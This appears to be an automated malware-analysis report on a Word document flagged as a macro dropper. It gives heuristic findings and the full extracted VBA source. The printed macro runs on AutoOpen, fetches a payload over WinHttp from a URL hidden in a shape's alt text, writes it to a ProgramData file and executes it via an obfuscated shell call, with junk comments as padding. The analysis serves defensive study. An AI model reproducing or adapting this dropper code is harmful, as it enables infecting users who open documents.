MALICIOUS
170
Risk Score
Heuristics 6
-
ClamAV: Doc.Dropper.Generic-9823539-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Generic-9823539-0
-
VBA project inside OOXML medium 3 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set uFtqv = CreateObject("WinHttp.WinHttpRequest.5.1") -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 10418 bytes |
SHA-256: e9275778cdba96f12f52f2dab8dfcda5e61d821938cd3dc4960209d83ab5bb6d |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "MAyXI"
Sub HNany(tPLJO, Optional ByVal tTCkD As String = "c:\programdata\aSKUC.pdf")
' Indole repacking
' Horticulturist unstable speedcop rockbottom
' Position eliminated cavalry
' Ineffectual mouthorgan gilt buttock
' Rhythmic buckling masterpieces aupair actives refutes
' Mosses giltedged leukaemia river eliminator complicated
' Rucks mourning inhalers mordant refuges
' Medieval
' Sarcophagi
' Halftruths bypasses
' Yelpings defamation oversubscribed egomaniacs
' Normality carborundum discharged
' Rubies geriatrics
' Occipital dermatological reciting psalmody
' Prophylaxis grizzled scale tarred procrastinator
' Chits winger thumping dislocating
' Outbreaks seamail enshrine stationer clobber shekels entrench
' Human compulsorily traded reallocating fluorescence collier
' Withdrew consolidate misinterpretation numberless
' Organism oast
' Bloodline
' Boring punter technological lugs
' Cached misinterpret beneficiaries
' Unoriginality reducibility
' Grain
' Educator
' Minedetector costive biennials picking power
' Metallic partnering infractions
' Underwood
' Mercilessly woolliness skinner tawdry
' Unprincipled nationalist wigging censuring pillion
' Defecting gawk coronations tangerines confiscating synovial
' Agglomerated stoics rowing ordaining theatre
' Directives hawaiian darkening
' Starlit underlined
' Splattering innocence encryption glucose scramble
' Tweeter flexion
' Heartening fulfilment publicises
mjsnK = tTCkD
Open mjsnK For Output As #1
' Woolliness
' Hypnotherapists passers pint stealers ravage
' Darkest comprises semifinal sleepwalking
' Snappy childishly ascribes unceasingly
Print #1, tPLJO
' Deliberately
' Rely
' Hark legitimated ballerina alaska bluffer mechanise viewable
' Pyjamas hesitations
' Impenetrably marvel triptych operating wainscot
Close #1
End Sub
' Bylaw toaster design collides
' Weatherproof bespeak seducers pityingly
' Facials coercions bogeyman handhold
' Ordained
Sub AutoOpen()
' Sissy butter tonedeaf dipolar females
' Shadow brilliantly pondered basify
' Antitheses lodge
' Running blackmails backpedalling compartment
' Emigre licentious civility
' Primogeniture landholding irremovable congruity
' Testiness pensioned informers pachyderm wreaks earlobes
' Chronologically tombola timings cayman
' Alterations betide consecration prematurity raindrops
' Flourished multinationals updater babylon intermolecular
' Zionist
' Sahib malice creole
' Chimaera ladles edict drays
' Relaxes mainland
' Inordinate quantifier audiovisual convened
' Blue pebbles dimensioned
' Flints shoes
' Beakers rephrasing labours
' Overplay supine defiling forgives
' Masterful bespeaks manslaughter
' Keystroke
' Dive communicable enneads
' Aubergines rudderless congealed showery
' Polewards tuns jock nagged caldera
' Improved
' Biker petrification advise
' Mindbogglingly ascriptions
' Contracts overheated humdrum
' Censured spirant absolution pawn hairbrush
' Barricades horsebox overtures roughened tidying
Dim PgjVU As New umKCU
' Dummied
' Baggages aristocracy impersonator
' Waistband baking culls
' Unsighted crossbred
' Rapists textiles unclenching unpopulated
tPLJO = PgjVU.VIDjf()
' Cruelties
' Bobbles barker reassemble disrespectfully
' Dishpan newsletters
' Relabellings fricatives expended squawking converts
' Trespassing
HNany zykxa(tPLJO)
' Ribbed physiologist
' Baptises actionable gaiter
' Singing revisit embalmed
' Fief earthwards oversee fetishism
' Militated beseeches
' Reprimanded toiler regulates quenchers month
' Protectorates pornography glooms benefactors
' Hurting goth
' Genets tuning definiteness
' Inquisitions
' Transferred dustman scrabbling weighing saunter doldrums
' Projection greenhorn inlet
' Twinkles fragmented
' Reclaimable gnarled rounded corruptions
IZPoz bSOlV(0) + "r32 c:\programdata\aSKUC.pdf", ""
End Sub
Function TsniH(eshoo, WtwvD)
' Posterity employ lit
' Branches heterosexuals shrinking endive
' Tincan anything
' Gibed malaysia
' June inflects
TsniH = Split(eshoo, WtwvD)
End Function
Attribute VB_Name = "tMnde"
' Slat crooners sacristy cofferdams
' Chaser mockups
' Respected plus
' Disbursement
' Mouthpieces disparities
Function zykxa(zvLtx)
' Reproducibly charm repays warded
' Guardedly foiling whether
' Dispensations prosecutor
' Reconsult inlaws uvula
' Frightening
' Maturing
zykxa = StrConv(zvLtx, vbUnicode)
' Jowl canonise bailout
' Secondclass mileage resetting
' Strayer dualistic
' Republicans premising
' Leasehold direct gold skincare absurdest voteless
' Quickness pollens
' Listed keystrokes officials prevent referendum decadent
End Function
' Maddened populace
' Improving gruffly circumspection parables
' Chirped proximate improvable microsurgery bestial
' Torches garottes howitzer
' Retraced entitled converted ingratitude screenplay
' Gibbered ponies abalone
Function Apsqe()
' Occupy threaded guilders
' Refuels bigot
' Quavering fondant interceptor
' Toilette meromorphic collier wellmade
' Slime boson ravels hopefully
' Quarts messiest waltzing
' Skeptic assay catchword
' Recapitulate sinter embarrasses debunk
' Distance neared
' Voyeur buoyantly subtropical
' Paperthin overtakes operands disputants
' Plums reminisces skylines sumptuously wrested
' Assayed orthopaedics
Apsqe = ActiveDocument.shapes(1).AlternativeText
End Function
' Escape how
' Vertical evangelists impinging slouch nonconformity
' Viler bake greening stretching
' Downgrade pianists cinematographer
' Recharges comprising
' Corporeally
Function bSOlV(wzzsK)
' Collapsed
' Rescale resolving securing telecommuting distinctive ethic
' Retinues bountifully
' Wives accusations incoherence tint promissory
' Contours stupid observer hawking frictions
' Brecciated rejuvenated sidestep relegation
' Dacha winces repeatable associateship extrapolation
' Asiatic
' Overshoot inflatable
' Kerbside commitment teepee
EAWSz = Apsqe()
dLxQC = TsniH(EAWSz, "kristi")
Qwptg = dLxQC(wzzsK)
bSOlV = Qwptg
End Function
Attribute VB_Name = "umKCU"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
' Unalike puritanism convalescence
' Reabsorb encourage uninjured worded distanced waring
' Dismembered elal backfiring entangled grafting
' Assemblages inapplicability tickled adopt
' Crust pulverise
' Amused kerb
' Yet heedlessness
Function VIDjf()
' Poetess luckless laird
' Wingers unblinkingly mockery ramping
' Cerebrum submerged unto
' Ruggedly inveigh stitched unreferencing sessile
' Haemorrhagic ridges eritrea aloud
Dim uFtqv As Object
' Binodal debriefing implementations
' Splash holiest keeping
' Studentship
' Juniper reversion pack stories tonalities
' Porridge quickest submersible rearming oxidisation battens
' Headwind embarrassedly paradigms
Set uFtqv = CreateObject("WinHttp.WinHttpRequest.5.1")
' Exiguous misrepresentation glycine heartrending
' Relives coexists
' Stipples
' Wears zoology minimises dictation soldiering beaching
' Looter monkey contemplates
' Antechamber
' Sprawl cripple inspections
' Spontaneously nooses bobtail
' Selfconfidence doubledealing emotional
' Salaried quartermaster
' Backhanded
' Shunters
' Validate springboard scudded midevening profitably
' Easiness pugilistic doings dissonant
' Impending stopgap multiphase fomenting
' Definably
' Harshest formulated emporia vulnerable
' Commuting insincerity
' Bewitch ruling
' Bursaries
' Cobweb noosed refrains clogging napalm
' Desertification
RNRtY = bSOlV(1)
' Conversations picnicked reviews napping
' Impersonated
' Maverick radium cosines tracksuit
' Redemption emancipating polishes sledge
' Groups voyaging jurisprudential
uFtqv.Open "GET", RNRtY, False
' Play frauds
' Digitalis lacrosse bluntest
' Archaeologist proletarians
' Exposures reads technocratic initially plasma deleting
' Rafts bestrode
uFtqv.Send
' Overdid photographers
' Urbanising entrap problematically maine
' Libels passive parliamentarians
' Roam electorally
' Insincerely wildoats incapacitate
VIDjf = uFtqv.responsebody
End Function
Attribute VB_Name = "oYPmW"
Sub IZPoz(OotCy, lgpVX)
' Exchangers surfactants
' Metamorphism skullcap postmistress proclamation
' Brutus allurements alludes pandemic
' Congruence unwelcome eclair
' Queer unenthusiastically
' Whisperings shoulders alterable bola
' Dunces lit tools housings appropriates
' Chancy treatise internalise propositioned constrictors
' Billiard
' Procession coffers refine
' Hire launder synapse bawdy importable
Set bGEiD = CreateObject(lgpVX + bSOlV(2) + "ll").exec(OotCy)
' Chromatic
' Outbred cheapened invisibles
' Legacy slimmer investigate
' Abstracts glaringly escarpment wadi
' Engraver braid heretics
' Capering
' Strainers aegean
' Fouled robotics enriches
' Gloating bough aperitif
' Telegraphic oblivious misdeed whirled
' Creator carburettor yesterdays
' Replied glowing narrowmindedness
' Shafting scooter burbles spire chameleon
' Friend
' Encore fade
' Inequities obscurer gristle recognisable upside
' Deify soaping
' Laboured professorial kinswoman
' Pools plateaux probabilities
' Spit tediums edit
' Squaring aggressors stew
' Disloyal witchlike
' Trays shallots wrestlers
' Zebra undermined spurns beanie unexpressed
' Baitings scarcest leaks photosphere voltage
' Dislocated cytotoxic knuckleduster
' Pigsty
' Surreptitiously leap jiggle overmuch
' Instrumented thermostat groping begrudgingly effectively predecessors
' Roughly peevishly printings
' Unforced increasing intemperance disfranchise
' Objections sucking
' Mediators articles amicably concordance
' Sevens portal invited
' Bestride slipway announcements
' Blurted falsifications purees recoveries fuller
' Analyst pajama needier
' Purple ledges
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 40960 bytes |
SHA-256: b23ff36499c5dfc42bfa1a30762119a08dc872ad58181592dbdf4035870a7216 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.